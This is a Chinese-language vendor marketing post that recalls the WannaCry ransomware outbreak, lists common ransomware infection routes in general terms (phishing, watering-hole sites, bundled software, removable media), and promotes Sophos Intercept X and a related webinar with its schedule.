说到勒索病毒,大家都会不自觉的想到WannaCry。是的,因为,它的爆发真的让好多人哭晕在厕所,而这次网络攻击也达到了“史无前例的级别”。此次勒索病毒,是通过互联网端口输入病毒程序,对重要文件进行加密然后敲诈,攻击目标直接锁定用户的数据,攻击手段竟是原本为了保 ...查看全部
说到勒索病毒,大家都会不自觉的想到WannaCry。是的,因为,它的爆发真的让好多人哭晕在厕所,而这次网络攻击也达到了“史无前例的级别”。此次勒索病毒,是通过互联网端口输入病毒程序,对重要文件进行加密然后敲诈,攻击目标直接锁定用户的数据,攻击手段竟是原本为了保护数据安全的密码技术,这些都提醒人们保护网络安全刻不容缓。
此外,网络病毒存在巨大的获利空间,在一段时间内,可能还会出现更多的变种病毒。因此,我们完全有理由相信,WannaCry只是一个开始。
知己知彼,才能百战不殆,下面O宝就为大家总结下,勒索软件的传播都有哪些途径。
网络钓鱼和垃圾邮件
网络罪犯在邮件正文中加入钓鱼网址链接。 借助网页木马传播,当用户不小心访问恶意网站时,勒索软件会被浏览器自动下载并在后台运行。
水坑式攻击
网络罪犯会将恶意软件植入到企业或个人经常访问的网站之中,一旦访问了这些网站,恶意程序会利用设备上的漏洞对其进行感染。 
捆绑传播发布
借助其他恶意软件传播渠道,与其他恶意软件捆绑发布传播;或者捆绑正常的软件进行传播。
借助移动存储传播
借助U盘、移动硬盘、闪存卡等可移动存储介质传播。
知道了勒索病毒的“套路”,我们要如何“对症下药”当然靠它
Sophos Intercept X下一代端点安全技术,Sophos致力于为企业提供整体安全解决方案,Intercept X 这么牛,还有哪些我们不知道的?想了解更多,看直播!
6月15日14 : 00“眼泪拯救不了企业安全对勒索软件下手就要‘稳、准、狠’”直播活动即将开启,Sophos Intercept X,何止看上去这么简单!
活动日程
14 : 00-14 : 05  嘉宾介绍
14 : 05-14 : 20  wannaCry带来的思考
14 : 20-14 : 40  如何从根本防御勒索软件
14 : 40-14 : 50  如何面对更复杂的威胁
14 : 50-15 : 00  互动答疑
点击报名观看直播>>>“眼泪拯救不了企业安全对勒索软件下手就要‘稳、准、狠’